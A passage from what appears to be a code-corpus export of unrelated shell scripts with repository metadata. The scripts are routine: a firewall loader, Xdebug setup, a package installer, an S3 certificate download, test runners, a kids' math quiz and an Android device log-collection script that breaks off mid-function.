pipeline="$(IFS='|' && echo "${pipeline_commands[*]}")"
eval "$pipeline" || exit_code="$?"
if (( "${exit_code-0}" > 1 ))
then
exit "$exit_code"
fi
| true |
da89b7bdd5dc717e59cc3d3babedc0c845ff814f | Shell | lina-taso/vyos-shellapi | /set-firewall-IPaddrlist.sh | UTF-8 | 1,168 | 3.234375 | 3 | [] | no_license | #!/bin/sh
NODE="firewall group network-group JP"
LEAF="network"
# environments
SHELL_API=/bin/cli-shell-api
vyatta_sbindir=/opt/vyatta/sbin
SET=${vyatta_sbindir}/my_set
DELETE=${vyatta_sbindir}/my_delete
COPY=${vyatta_sbindir}/my_copy
MOVE=${vyatta_sbindir}/my_move
RENAME=${vyatta_sbindir}/my_rename
ACTIVATE=${vyatta_sbindir}/my_activate
DEACTIVATE=${vyatta_sbindir}/my_activate
COMMENT=${vyatta_sbindir}/my_comment
COMMIT=${vyatta_sbindir}/my_commit
DISCARD=${vyatta_sbindir}/my_discard
SAVE=${vyatta_sbindir}/vyatta-save-config.pl
# setup session
session_env=$($SHELL_API getSessionEnv $PPID)
eval $session_env
${SHELL_API} setupSession
# config set
$DELETE $NODE
echo "[`date +'%Y/%m/%d %H:%M:%S'`] Deleted existing JP node"
echo "[`date +'%Y/%m/%d %H:%M:%S'`] Adding JP node"
LINE=0
while read x; do
$SET $NODE $LEAF $x
LINE=$((LINE+1))
[ $(($LINE % 100)) == 0 ] && echo "[`date +'%Y/%m/%d %H:%M:%S'`] $LINE lines were read"
done
echo "[`date +'%Y/%m/%d %H:%M:%S'`] $LINE lines were read"
# config commit/save
$COMMIT
echo "[`date +'%Y/%m/%d %H:%M:%S'`] Added JP node and changes are commited"
$SAVE
echo "[`date +'%Y/%m/%d %H:%M:%S'`] Saved"
| true |
f11fde23f0b485eeb71498fa37b2923322fbc8db | Shell | matiux/php-design-patterns | /docker/php/conf/xdebug-starter.sh | UTF-8 | 638 | 3.28125 | 3 | [] | no_license | #!/usr/bin/env bash
set -e
# if `XDEBUG_HOST_IP` is manually configured as env
XDEBUG_HOST="$HOST_IP"
# try to get the ip of the host from ns host.docker.internal
if [[ -z "$XDEBUG_HOST" ]]; then
XDEBUG_HOST=$(getent hosts host.docker.internal | awk '{ print $1 }')
fi
# try to get the linux host ip
if [[ -z "$XDEBUG_HOST" || "$XDEBUG_HOST" == "127.0.0.1" ]]; then
XDEBUG_HOST=$(ip route | awk 'NR==1 {print $3}')
fi
#sed -i "s/xdebug\.client_host=.*/xdebug\.client_host=${XDEBUG_HOST}/" /usr/local/etc/php/conf.d/docker-php-ext-xdebug.ini
sed -i "s/xdebug\.client_host=.*/xdebug\.client_host=${XDEBUG_HOST}/" "${XDEBUG_CONF_FILE}" | true |
2b654508790d95e92230ee07a5ef6b3966e1ad0e | Shell | LiCijun/cmd | /yay-file | UTF-8 | 5,118 | 3.328125 | 3 | [] | no_license | #!/usr/bin/env bash
#
# SPDX-License-Identifier: GPL-3.0-or-later
set -euo pipefail
#set -x
#set -x 将在命令执行前打印出命令 方便调试
set -e
# -e 遇到错误将停止
set -o pipefail
# pipefail set -e有一个例外情况,就是不适用于管道命令。所谓管道命令,就是多个子命令通过管道运算符(|)组合成为一个大的命令。Bash 会把最后一个子命令的返回值,作为整个命令的返回值。也就是说,只要最后一个子命令不失败,管道命令总是会执行成功,因此它后面命令依然会执行,set -e就失效了。
set -u
# -u 遇到不存在的变量 将报错
## 写法一
#set -euxo pipefail
## 写法二
#set -eux
#set -o pipefail
#这两种写法建议放在所有 Bash 脚本的头部。另一种办法是在执行 Bash 脚本的时候,从命令行传入这些参数。
#$ bash -euxo pipefail script.sh
function saveres()
{
resfilename=$1
resappname=$2
rescmdecho=$3
echo $resappname >> $resfilename
echo $resappname >> $resfilename-detail
echo $rescmdecho >> $resfilename-detail
echo $resappname >> $resfilename-detail
echo >> $resfilename-detail
}
function yayapp()
{
appname=$1
# echo install Start app name : $appname
set +e
#cmdecho=$(yay --noconfirm --needed -S $appname >/dev/null 2>&1)
#cmdecho=$(yay --noconfirm --needed -S $appname 2> /dev/stdout)
cmdecho=$(yay --noconfirm --needed -S $appname 1>&1 2>&1)
#cmdecho=$(yay --noconfirm --needed -S $appname 1>/dev/null 2>&1)
apperr=$?
set -e
if [ $apperr -eq 0 ] ; then
saveres $filename-OK $appname "$cmdecho"
else
set +e
check-string-contain "$cmdecho" "下载源文件时出错"
err=$?
set -e
if [ $err -eq 0 ]
then
saveres $filename-DownError $appname "$cmdecho"
else
set +e
check-string-contain "$cmdecho" "包冲突无法通过 noconfirm 解决,正在中止|检测到未解决的软件包冲突"
err=$?
set -e
# echo check-string 检测到未解决的软件包冲突 $err
if [ $err -eq 0 ]
then
saveres $filename-Confirm $appname "$cmdecho"
else
set +e
check-string-contain "$cmdecho" "生成时出错:"
err=$?
set -e
if [ $err -eq 0 ]
then
saveres $filename-BuildError $appname "$cmdecho"
else
set +e
check-string-contain "$cmdecho" "status 429: Rate limit reached"
err=$?
set -e
if [ $err -eq 0 ]
then
echo $cmdecho
else
set +e
check-string-contain "$cmdecho" "错误:无法锁定数据库"
err=$?
set -e
if [ $err -eq 0 ]
then
echo 错误:无法锁定数据库
else
set +e
check-string-contain "$cmdecho" "找不到所有需要的包:"
err=$?
set -e
if [ $err -eq 0 ]
then
saveres $filename-needapp $appname "$cmdecho"
else
set +e
check-string-contain "$cmdecho" "错误:无法准备事务处理 (无法满足依赖关系)"
err=$?
set -e
if [ $err -eq 0 ]
then
saveres $filename-dependencyError $appname "$cmdecho"
else
echo yay Result [$appname]:$cmdecho
saveres $filename-$apperr $appname "$cmdecho"
fi
fi
fi
fi
fi
fi
fi
fi
# echo $cmdecho
# echo install Over app name : $appname error code $apperr
echo >&6 # 执行完一条命令会将令牌放回管道
}
# Optional second argument selects the number of parallel install workers.
if [ $# -gt 1 ] # more than one argument supplied?
then
    thread=$2
else
    thread=30
fi
echo Thread Count is : $thread
check-param-num $# 1 请输入需要安装的文件名
if [ ! -f "$1" ]; then
    echo 输入的文件不存在
else
    # Build a token pipe bound to fd 6 that caps concurrency at $thread jobs.
    tmp_fifofile=$(mktemp -u)
    #echo $tmp_fifofile
    mkfifo $tmp_fifofile
    exec 6<>$tmp_fifofile # bind fd 6 read/write to the named pipe
    rm $tmp_fifofile # the open fd keeps the pipe alive, so the path can go
    # Seed the pipe with one token per allowed concurrent job.
    for ((i=0;i<$thread;i++));do
        echo >&6
    done
    filename=$1
    # NOTE(review): $(<$filename) word-splits, so the input is assumed to be
    # one package name per line with no embedded whitespace — confirm format.
    for line in $(<$filename);
    do
        set +e
        sleep 1s
        # err=$?
        # if [ $err -ne 0 ]
        # then
        # echo sleep err:$err
        # fi
        set -e
        read -u6 # consume one token; blocks until a finished worker returns one
        yayapp $line &
    done
    wait
    exec 6>&- # close the write side of fd 6
    exec 6<&- # close the read side of fd 6
fi
| true |
536cd665a39b0bfc592083c4c6892d83f5f002ba | Shell | isabella232/infrastructure-reference | /infrastructure-modules/qa/instance-pool/scripts/download-registry-certificates.sh | UTF-8 | 1,527 | 3.546875 | 4 | [
"Apache-2.0"
] | permissive | #######################################################################
# This script is an additional user-data script for modules that require
# registry certificates.
# NOTE: This is not a standalone script and is to be used in combination
# with the bootstrap-user-data script, which must define:
#   aws_region, configBucket, s3Key, s3Secret, s3Token, stackName,
#   contentType, dateValue, and the helpers create_string_to_sign
#   (sets stringToSign) and debug_log.
regCertDir="/etc/registry-certificates"
mkdir -m 700 -p ${regCertDir}
cd ${regCertDir}
regCertFile="docker-registry/registry-certificates/ca.pem"
resource="/${configBucket}/${regCertFile}"
create_string_to_sign
# AWS signature v2: base64(HMAC-SHA1(secret, stringToSign)).
signature=$(/bin/echo -n "$stringToSign" | openssl sha1 -hmac ${s3Secret} -binary | base64)
debug_log
# Download the CA certificate into the current directory (${regCertDir}).
curl -s -L -O -H "Host: ${configBucket}.s3-${aws_region}.amazonaws.com" \
 -H "Content-Type: ${contentType}" \
 -H "Authorization: AWS ${s3Key}:${signature}" \
 -H "x-amz-security-token:${s3Token}" \
 -H "Date: ${dateValue}" \
 https://${configBucket}.s3-${aws_region}.amazonaws.com/${regCertFile}
# If ca.pem was downloaded and is a valid certificate, install it for the
# local docker registry; otherwise clean up whatever was downloaded.
if [ -f ${regCertDir}/ca.pem ] && grep -q "BEGIN CERTIFICATE" ${regCertDir}/ca.pem ;
then
 dockerCertDir="/etc/docker/certs.d/registry.${stackName}.local:80/"
 mkdir -p ${dockerCertDir}
 # NOTE: docker expects the extension .crt, so rename ca.pem to ca.crt.
 mv ${regCertDir}/ca.pem ${regCertDir}/ca.crt
 cp ${regCertDir}/ca.crt ${dockerCertDir}/ca.crt
else
 # BUGFIX: was `rm -f ${regCertFile}/*` — that appends /* to a *file* path
 # ("docker-registry/.../ca.pem/*") and never matches anything. The intent
 # (per the comment above) is to delete the downloaded files in regCertDir.
 rm -f ${regCertDir}/*
fi
| true |
5b78abd3c60509effb765a4b1fbb78b3ba5db410 | Shell | hmcts/cmc-citizen-frontend | /bin/run-nightly-tests.sh | UTF-8 | 813 | 3.0625 | 3 | [
"MIT"
] | permissive | #!/bin/bash
set -ex

# Pay is skipped on sprod, so the functional tests cannot run there.
if [[ ${TEST_URL} = *"sprod"* ]]; then
  echo "Not running functional tests on sprod, due to pay being skipped"
  exit 0
fi

# NOTE: intentionally left unquoted at every use below — the value must
# word-split into "file1 -f file2" so both compose files are passed.
ADDITIONAL_COMPOSE_FILE="docker-compose.nightly-functional-tests.yml -f docker-compose.yml"

# Tear the compose stack down on any exit path (signal or normal exit).
function shutdownDocker() {
  docker-compose -f ${ADDITIONAL_COMPOSE_FILE} down
}

trap shutdownDocker INT TERM QUIT EXIT

docker-compose --version

if [[ "${1}" != "--no-build" ]]; then
  # Docker hub is slow to build we should always be using the latest version here
  docker-compose -f ${ADDITIONAL_COMPOSE_FILE} build citizen-integration-tests
fi

docker-compose -f ${ADDITIONAL_COMPOSE_FILE} up --no-color -d remote-webdriver
# Run the tests as the invoking user so result files are not root-owned.
# (modernized: $( ) instead of backticks, $USER quoted)
docker-compose -f ${ADDITIONAL_COMPOSE_FILE} run -u "$(id -u "$USER")" citizen-integration-tests
docker-compose -f ${ADDITIONAL_COMPOSE_FILE} down
| true |
bedf1cc5542c605b53278d3c4c2cc3652612f116 | Shell | DamienRobert/dotfiles | /user/maint/misc/old/01_updateallcomptes | UTF-8 | 463 | 3.3125 | 3 | [
"LicenseRef-scancode-warranty-disclaimer",
"MIT"
] | permissive | #!/bin/zsh
# Launch 00update on computers: regenerate the config files on every machine
# listed for unison sync.
# Relies on ~/.initvars defining CFGFILES, MYCOMPUTERS and TOUNISON, and on
# `$MYCOMPUTERS --export <name>` exporting the COMPUTER assoc array (key sshu).
. $HOME/.initvars
CFGFILESNAME="${CFGFILES#$HOME/}"
eval $($MYCOMPUTERS -l --export)
COMPUTERS=($TOUNISON)
# First pass: show which host each entry resolves to, as a sanity check.
for comp in $COMPUTERS; do
	eval $($MYCOMPUTERS --export $comp)
	echo "-- $comp --"
	ssh2 $COMPUTER[sshu] cat .initvars | grep MYHOST
done
echo "Update config files? (Press a key to continue)"
read a
# Second pass: trigger the config generation remotely.
for comp in $COMPUTERS; do
	# BUGFIX: re-export per machine; previously $COMPUTER kept the value from
	# the last iteration of the first loop, so every ssh2 hit the same host.
	eval $($MYCOMPUTERS --export $comp)
	echo "-- $comp --"
	ssh2 $COMPUTER[sshu] $CFGFILESNAME/generate.rb --all
done
| true |
0de4d60c3702ffd3351d7e22f2a4453664fab3b0 | Shell | ghuntley/monorepo | /third_party/git/t/t1600-index.sh | UTF-8 | 1,769 | 3.046875 | 3 | [
"GPL-1.0-or-later",
"LGPL-2.0-or-later",
"LGPL-2.1-only",
"GPL-3.0-only",
"GPL-2.0-only",
"MIT"
] | permissive | #!/bin/sh
# Tests for on-disk index format handling: invalid or out-of-range
# GIT_INDEX_VERSION / index.version values must fall back to a default with
# a warning, and the environment variable must win over the config setting.
test_description='index file specific tests'

. ./test-lib.sh

test_expect_success 'setup' '
	echo 1 >a
'

# A non-numeric GIT_INDEX_VERSION is rejected; git warns and picks a default.
# (sed strips digits so the expected text is independent of the default.)
test_expect_success 'bogus GIT_INDEX_VERSION issues warning' '
	(
		rm -f .git/index &&
		GIT_INDEX_VERSION=2bogus &&
		export GIT_INDEX_VERSION &&
		git add a 2>&1 | sed "s/[0-9]//" >actual.err &&
		sed -e "s/ Z$/ /" <<-\EOF >expect.err &&
		warning: GIT_INDEX_VERSION set, but the value is invalid.
		Using version Z
		EOF
		test_i18ncmp expect.err actual.err
	)
'

# A numeric but unsupported version (1) must also trigger the fallback warning.
test_expect_success 'out of bounds GIT_INDEX_VERSION issues warning' '
	(
		rm -f .git/index &&
		GIT_INDEX_VERSION=1 &&
		export GIT_INDEX_VERSION &&
		git add a 2>&1 | sed "s/[0-9]//" >actual.err &&
		sed -e "s/ Z$/ /" <<-\EOF >expect.err &&
		warning: GIT_INDEX_VERSION set, but the value is invalid.
		Using version Z
		EOF
		test_i18ncmp expect.err actual.err
	)
'

# With an index already on disk, the bad value is ignored silently.
test_expect_success 'no warning with bogus GIT_INDEX_VERSION and existing index' '
	(
		GIT_INDEX_VERSION=1 &&
		export GIT_INDEX_VERSION &&
		git add a 2>actual.err &&
		test_must_be_empty actual.err
	)
'

# Same out-of-bounds check, but for the index.version config variable.
test_expect_success 'out of bounds index.version issues warning' '
	(
		sane_unset GIT_INDEX_VERSION &&
		rm -f .git/index &&
		git config --add index.version 1 &&
		git add a 2>&1 | sed "s/[0-9]//" >actual.err &&
		sed -e "s/ Z$/ /" <<-\EOF >expect.err &&
		warning: index.version set, but the value is invalid.
		Using version Z
		EOF
		test_i18ncmp expect.err actual.err
	)
'

# When both are set, GIT_INDEX_VERSION (4) must override index.version (2).
test_expect_success 'GIT_INDEX_VERSION takes precedence over config' '
	(
		rm -f .git/index &&
		GIT_INDEX_VERSION=4 &&
		export GIT_INDEX_VERSION &&
		git config --add index.version 2 &&
		git add a 2>&1 &&
		echo 4 >expect &&
		test-tool index-version <.git/index >actual &&
		test_cmp expect actual
	)
'

test_done
| true |
8d645370fc23a0ef1e37762c92f32ca004850eed | Shell | pritpane/Shell_Scripting | /For-loop3.sh | UTF-8 | 139 | 2.984375 | 3 | [] | no_license | #!/bin/bash
# Create five empty files named 1 through 5 in the current directory.
# Author: Pritam Nipane
# Created: 03-May-2020
n=1
while [ "$n" -le 5 ]
do
	touch "$n"
	n=$((n + 1))
done
| true |
0b6b75b1a83d8e54b3c9603b4530a1c8b06c8be4 | Shell | pranavramesh123/minecraft | /install.sh | UTF-8 | 1,024 | 3.828125 | 4 | [] | no_license | #! /bin/bash
# Install the minecraft blocks server as a systemd service.
# Must be run as root from the directory that contains server.py and the
# blocks_server.service unit file.
SERVER_FILE="server.py"
SERVICE_FILE="blocks_server.service"
DAEMON_DIR="/etc/systemd/system"
# Assure we are root (the script modifies system files).
# NOTE(review): these error paths `exit` with the status of the last echo
# (i.e. 0); consider `exit 1` so callers can detect failure.
if [ "$EUID" -ne 0 ]
then
	echo "run as root"
	exit
fi
# Refuse to overwrite an already-installed unit file.
if [ -f "$DAEMON_DIR/$SERVICE_FILE" ]
then
	echo "$SERVICE_FILE already exists in $DAEMON_DIR"
	echo "aborting"
	exit
fi
# Print some log messages.
echo "1: installing blocks server"
# BUGFIX: the message used $SERVICE_NAME, which is never defined (it printed
# "(.service)"); report the actual unit file name instead.
echo "2: creating service unit ($SERVICE_FILE) in $DAEMON_DIR"
# Copy the service unit to the systemd directory.
sudo cp "$SERVICE_FILE" "$DAEMON_DIR"
# Append the absolute path of the server script to the installed unit
# (use $SERVER_FILE instead of repeating the literal "server.py").
echo "ExecStart=$PWD/$SERVER_FILE" >> "$DAEMON_DIR/$SERVICE_FILE"
echo "3: regenerating systemd dependency trees"
sudo systemctl daemon-reload
echo "4: install complete"
echo "use \`sudo systemctl start/stop/restart/status $SERVICE_FILE\` to control the server"
echo "note that you can drop the \`.service\` extension in the above command"
echo "please leave a star on GitHub!"
| true |
97377d56de82d8c3d1ab21b8e40ca41f61859f59 | Shell | copyit/script | /trainkids.sh | UTF-8 | 938 | 3.671875 | 4 | [] | no_license | #!/bin/bash
# Generate one single-digit subtraction problem with a non-negative answer.
# Globals (read):    i         - current question index
# Globals (written): suansi[i] - problem text "m-n=" with m >= n
#                    ans[i]    - the answer m-n
function jianfa() {
    local a b m n
    a=$(shuf -i 1-9 -n1)
    b=$(shuf -i 1-9 -n1)
    # Order the operands arithmetically instead of spawning an
    # echo | tr | sort | tail pipeline per value (same result, far cheaper).
    if [ "$a" -ge "$b" ]; then
        m=$a
        n=$b
    else
        m=$b
        n=$a
    fi
    suansi[i]="$m-$n="
    ans[i]=$((m-n))
}
# Generate one addition problem whose sum never exceeds 10.
# Globals (read):    i         - current question index
# Globals (written): suansi[i] - problem text "m+n="
#                    ans[i]    - the answer m+n
function JIAFA() {
    local m n
    m=$(shuf -i 1-9 -n1)
    # n is 1..(10-m), so m+n <= 10. One arithmetic expansion replaces the
    # original triple-nested $(( $(( $RANDOM % $((...)) )) + 1 )) form.
    n=$(( RANDOM % (10 - m) + 1 ))
    suansi[i]="$m+$n="
    ans[i]=$((m+n))
}
# Interactive quiz loop: asks how many questions to attempt, then serves
# randomly chosen subtraction/addition problems until all are answered.
# Reads from /dev/tty so the prompts work even when stdin is redirected.
function main() {
    read -p "这次想挑战多少题目:" num </dev/tty
    for ((i=0; i<num; i++)); do
        # Coin flip: 1 -> subtraction (jianfa), 2 -> addition (JIAFA).
        pick=$(shuf -i 1-2 -n1)
        [[ $pick == 1 ]] && jianfa || JIAFA
        echo ${suansi[i]}
        read -p "以上题目的答案是:" inputans </dev/tty
        # On a wrong answer, step the index back so a fresh question is
        # generated for the same slot (the loop does not repeat the question).
        [[ $inputans == ${ans[i]} ]] && echo 答对了,继续加油哟 || i=$((i-1))
    done
    # Here i == num: every slot was eventually answered correctly.
    echo "挑战成功,太棒了!这次已经答对了$i道题目了,休息一下吧!"
}
main
#TODO
# - multiplication and division problems
# - configurable number range for the generated problems
# - fail the challenge when the error rate is too high
# - review of the questions answered incorrectly
ec5416985c93398696cb686f9499190f366475f4 | Shell | mhcrnl/bash2020 | /09if_else.sh | UTF-8 | 88 | 2.671875 | 3 | [] | no_license | #!/usr/bin/env bash
# else example
if [ $# -eg 1 ]
then
nl $1
else
nl /dev/stdin
fi
| true |
080e38b2164c84e8ad3c84e017561858e7aa986d | Shell | FrictionlessCoin/p3-batchrefine | /docker/internal/p3-transformer-start.sh | UTF-8 | 502 | 2.875 | 3 | [] | no_license | #!/usr/bin/env bash
BATCHREFINE_ROOT=${BATCHREFINE_ROOT:-/batchrefine}
OPENREFINE_ROOT=${OPENREFINE_ROOT:-/OpenRefine}
REFINE_OPTIONS=${1:-''}
VERSION=`cat ${BATCHREFINE_ROOT}/version`
shift 1
echo "refine options are ${REFINE_OPTIONS}"
echo "transformer options are $@"
# Starts OpenRefine ...
${OPENREFINE_ROOT}/refine ${REFINE_OPTIONS} &
# ... and the P3 transformer.
java -jar ${BATCHREFINE_ROOT}/clients/clients-transformer/target/clients-transformer-${VERSION}-jar-with-dependencies.jar $@
| true |
cf73bb0ca8e2339cbbdb462096b4cfaf8704699d | Shell | forever361/img | /autochmod.sh | UTF-8 | 22,614 | 3.359375 | 3 | [] | no_license | #!/system/bin/sh
DATE=`date +%F-%H`
CURTIME=`date +%F-%H-%M-%S`
ROOT_AUTOTRIGGER_PATH=/sdcard/oppo_log
ROOT_TRIGGER_PATH=/sdcard/oppo_log/trigger
DATA_LOG_PATH=/data/oppo_log
CACHE_PATH=/cache/admin
config="$1"
function Preprocess(){
mkdir -p $ROOT_AUTOTRIGGER_PATH
mkdir -p $ROOT_TRIGGER_PATH
}
function log_observer(){
autostop=`getprop persist.sys.autostoplog`
if [ x"${autostop}" = x"1" ]; then
boot_completed=`getprop sys.boot_completed`
sleep 10
while [ x${boot_completed} != x"1" ];do
sleep 10
boot_completed=`getprop sys.boot_completed`
done
space_full=false
while [ ${space_full} == false ];do
sleep 60
full_date=`date +%F-%H-%M`
FreeSize=`df /data | grep /data | $XKIT awk '{print $4}'`
isM=`echo ${FreeSize} | $XKIT awk '{ print index($1,"M")}'`
if [ ${isM} = "0" ]; then
echo "$full_date left space ${FreeSize} more than 1G"
else
leftsize=`echo ${FreeSize} | $XKIT awk '{printf("%d",$1)}'`
if [ $leftsize -le 300 ];then
space_full=true
echo "$full_date leftspace $FreeSize is less than 300M,stop log" >> ${DATA_LOG_PATH}/log_history.txt
setprop persist.sys.assert.panic false
setprop ctl.stop logcatsdcard
setprop ctl.stop logcatradio
setprop ctl.stop logcatevent
setprop ctl.stop logcatkernel
setprop ctl.stop tcpdumplog
setprop ctl.stop fingerprintlog
setprop ctl.stop fplogqess
fi
fi
done
fi
}
function backup_unboot_log(){
i=1
while [ true ];do
if [ ! -d /cache/unboot_$i ];then
is_folder_empty=`ls $CACHE_PATH/*`
if [ "$is_folder_empty" = "" ];then
echo "folder is empty"
else
mv /cache/admin /cache/unboot_$i
fi
break
else
i=`$XKIT expr $i + 1`
fi
if [ $i -gt 5 ];then
break
fi
done
}
function initcache(){
panicenable=`getprop persist.sys.assert.panic`
boot_completed=`getprop sys.boot_completed`
if [ x"${panicenable}" = x"true" ] && [ x"${boot_completed}" != x"1" ]; then
if [ ! -d /dev/log ];then
mkdir -p /dev/log
chmod -R 755 /dev/log
fi
is_admin_empty=`ls $CACHE_PATH | wc -l`
if [ "$is_admin_empty" != "0" ];then
backup_unboot_log
fi
mkdir -p ${CACHE_PATH}
mkdir -p ${CACHE_PATH}/apps
mkdir -p ${CACHE_PATH}/kernel
mkdir -p ${CACHE_PATH}/netlog
mkdir -p ${CACHE_PATH}/fingerprint
setprop sys.oppo.collectcache.start true
fi
}
function logcatcache(){
panicenable=`getprop persist.sys.assert.panic`
argtrue='true'
if [ "${panicenable}" = "${argtrue}" ]; then
/system/bin/logcat -f ${CACHE_PATH}/apps/android_boot.txt -r10240 -n 5 -v threadtime
fi
}
function radiocache(){
radioenable=`getprop persist.sys.assert.panic`
argtrue='true'
if [ "${radioenable}" = "${argtrue}" ]; then
/system/bin/logcat -b radio -f ${CACHE_PATH}/apps/radio_boot.txt -r4096 -n 3 -v threadtime
fi
}
function eventcache(){
panicenable=`getprop persist.sys.assert.panic`
argtrue='true'
if [ "${panicenable}" = "${argtrue}" ]; then
/system/bin/logcat -b events -f ${CACHE_PATH}/apps/events_boot.txt -r4096 -n 10 -v threadtime
fi
}
function kernelcache(){
panicenable=`getprop persist.sys.assert.panic`
argtrue='true'
if [ "${panicenable}" = "${argtrue}" ]; then
/system/xbin/klogd -f ${CACHE_PATH}/kernel/kinfo_boot0.txt -n -x -l 7
fi
}
function tcpdumpcache(){
tcpdmpenable=`getprop persist.sys.assert.panic`
argtrue='true'
if [ "${tcpdmpenable}" = "${argtrue}" ]; then
system/xbin/tcpdump -i any -p -s 0 -W 2 -C 10 -w ${CACHE_PATH}/netlog/tcpdump_boot -Z root
fi
}
function fingerprintcache(){
cat /sys/kernel/debug/tzdbg/log > ${CACHE_PATH}/fingerprint/fingerprint_boot.txt
}
function fplogcache(){
cat /sys/kernel/debug/tzdbg/qsee_log > ${CACHE_PATH}/fingerprint/qsee_boot.txt
}
function PreprocessLog(){
panicenable=`getprop persist.sys.assert.panic`
argtrue='true'
if [ "${panicenable}" = "${argtrue}" ]; then
boot_completed=`getprop sys.boot_completed`
decrypt_delay=0
while [ x${boot_completed} != x"1" ];do
sleep 1
decrypt_delay=`expr $decrypt_delay + 1`
boot_completed=`getprop sys.boot_completed`
done
if [ ! -d /dev/log ];then
mkdir -p /dev/log
chmod -R 755 /dev/log
fi
LOGTIME=`date +%F-%H-%M`
ROOT_SDCARD_LOG_PATH=${DATA_LOG_PATH}/${LOGTIME}
ROOT_SDCARD_apps_LOG_PATH=${ROOT_SDCARD_LOG_PATH}/apps
ROOT_SDCARD_kernel_LOG_PATH=${ROOT_SDCARD_LOG_PATH}/kernel
ROOT_SDCARD_netlog_LOG_PATH=${ROOT_SDCARD_LOG_PATH}/netlog
ROOT_SDCARD_FINGERPRINTERLOG_PATH=${ROOT_SDCARD_LOG_PATH}/fingerprint
ASSERT_PATH=${ROOT_SDCARD_LOG_PATH}/oppo_assert
TOMBSTONE_PATH=${ROOT_SDCARD_LOG_PATH}/tombstone
ANR_PATH=${ROOT_SDCARD_LOG_PATH}/anr
mkdir -p ${ROOT_SDCARD_LOG_PATH}
mkdir -p ${ROOT_SDCARD_apps_LOG_PATH}
mkdir -p ${ROOT_SDCARD_kernel_LOG_PATH}
mkdir -p ${ROOT_SDCARD_netlog_LOG_PATH}
mkdir -p ${ROOT_SDCARD_FINGERPRINTERLOG_PATH}
mkdir -p ${ASSERT_PATH}
mkdir -p ${TOMBSTONE_PATH}
mkdir -p ${ANR_PATH}
chmod -R 777 ${ROOT_SDCARD_LOG_PATH}
echo ${LOGTIME} >> /data/oppo_log/log_history.txt
echo ${LOGTIME} >> /data/oppo_log/transfer_list.txt
decrypt=`getprop com.oppo.decrypt`
if [ x"${decrypt}" != x"true" ]; then
setprop ctl.stop logcatcache
setprop ctl.stop radiocache
setprop ctl.stop eventcache
setprop ctl.stop kernelcache
setprop ctl.stop fingerprintcache
setprop ctl.stop fplogcache
setprop ctl.stop tcpdumpcache
mv ${CACHE_PATH}/* ${ROOT_SDCARD_LOG_PATH}/
mv /cache/unboot_* ${ROOT_SDCARD_LOG_PATH}/
setprop com.oppo.decrypt true
fi
setprop com.oppo.debug.time ${LOGTIME}
fi
setprop sys.oppo.collectlog.start true
setprop sys.oppo.logkit.appslog ${ROOT_SDCARD_apps_LOG_PATH}
setprop sys.oppo.logkit.kernellog ${ROOT_SDCARD_kernel_LOG_PATH}
setprop sys.oppo.logkit.netlog ${ROOT_SDCARD_netlog_LOG_PATH}
setprop sys.oppo.logkit.assertlog ${ASSERT_PATH}
setprop sys.oppo.logkit.anrlog ${ANR_PATH}
setprop sys.oppo.logkit.tombstonelog ${TOMBSTONE_PATH}
setprop sys.oppo.logkit.fingerprintlog ${ROOT_SDCARD_FINGERPRINTERLOG_PATH}
}
function initLogPath(){
FreeSize=`df /data | grep /data | $XKIT awk '{print $4}'`
isM=`echo ${FreeSize} | $XKIT awk '{ print index($1,"M")}'`
if [ ${isM} = "0" ]; then
androidSize=51200
androidCount=`echo ${FreeSize} 30 50 ${androidSize} | $XKIT awk '{printf("%d",$1*$2*1024*1024/$3/$4)}'`
radioSize=20480
radioCount=`echo ${FreeSize} 1 50 ${radioSize} | $XKIT awk '{printf("%d",$1*$2*1024*1024/$3/$4)}'`
eventSize=20480
eventCount=`echo ${FreeSize} 1 50 ${eventSize} | $XKIT awk '{printf("%d",$1*$2*1024*1024/$3/$4)}'`
tcpdumpSize=100
tcpdumpCount=`echo ${FreeSize} 10 50 ${tcpdumpSize} | $XKIT awk '{printf("%d",$1*$2*1024/$3/$4)}'`
else
androidSize=20480
androidCount=`echo ${FreeSize} 30 50 ${androidSize} | $XKIT awk '{printf("%d",$1*$2*1024/$3/$4)}'`
radioSize=10240
radioCount=`echo ${FreeSize} 1 50 ${radioSize} | $XKIT awk '{printf("%d",$1*$2*1024/$3/$4)}'`
eventSize=10240
eventCount=`echo ${FreeSize} 1 50 ${eventSize} | $XKIT awk '{printf("%d",$1*$2*1024/$3/$4)}'`
tcpdumpSize=50
tcpdumpCount=`echo ${FreeSize} 10 50 ${tcpdumpSize} | $XKIT awk '{printf("%d",$1*$2/$3/$4)}'`
fi
ROOT_SDCARD_apps_LOG_PATH=`getprop sys.oppo.logkit.appslog`
ROOT_SDCARD_kernel_LOG_PATH=`getprop sys.oppo.logkit.kernellog`
ROOT_SDCARD_netlog_LOG_PATH=`getprop sys.oppo.logkit.netlog`
ASSERT_PATH=`getprop sys.oppo.logkit.assertlog`
TOMBSTONE_PATH=`getprop sys.oppo.logkit.tombstonelog`
ANR_PATH=`getprop sys.oppo.logkit.anrlog`
ROOT_SDCARD_FINGERPRINTERLOG_PATH=`getprop sys.oppo.logkit.fingerprintlog`
}
function PreprocessOther(){
mkdir -p $ROOT_TRIGGER_PATH/${CURTIME}
GRAB_PATH=$ROOT_TRIGGER_PATH/${CURTIME}
}
function Logcat(){
panicenable=`getprop persist.sys.assert.panic`
argtrue='true'
if [ "${panicenable}" = "${argtrue}" ]; then
/system/bin/logcat -f ${ROOT_SDCARD_apps_LOG_PATH}/android.txt -r${androidSize} -n ${androidCount} -v threadtime -A
fi
}
function LogcatRadio(){
radioenable=`getprop persist.sys.assert.panic`
argtrue='true'
if [ "${radioenable}" = "${argtrue}" ]; then
/system/bin/logcat -b radio -f ${ROOT_SDCARD_apps_LOG_PATH}/radio.txt -r${radioSize} -n ${radioCount} -v threadtime -A
fi
}
function LogcatEvent(){
panicenable=`getprop persist.sys.assert.panic`
argtrue='true'
if [ "${panicenable}" = "${argtrue}" ]; then
/system/bin/logcat -b events -f ${ROOT_SDCARD_apps_LOG_PATH}/events.txt -r${eventSize} -n ${eventCount} -v threadtime -A
fi
}
function LogcatKernel(){
panicenable=`getprop persist.sys.assert.panic`
argtrue='true'
if [ "${panicenable}" = "${argtrue}" ]; then
/system/xbin/klogd -f - -n -x -l 7 | $XKIT tee - ${ROOT_SDCARD_kernel_LOG_PATH}/kinfo0.txt | $XKIT awk 'NR%400==0'
fi
}
function tcpdumpLog(){
tcpdmpenable=`getprop persist.sys.assert.panic`
argtrue='true'
if [ "${tcpdmpenable}" = "${argtrue}" ]; then
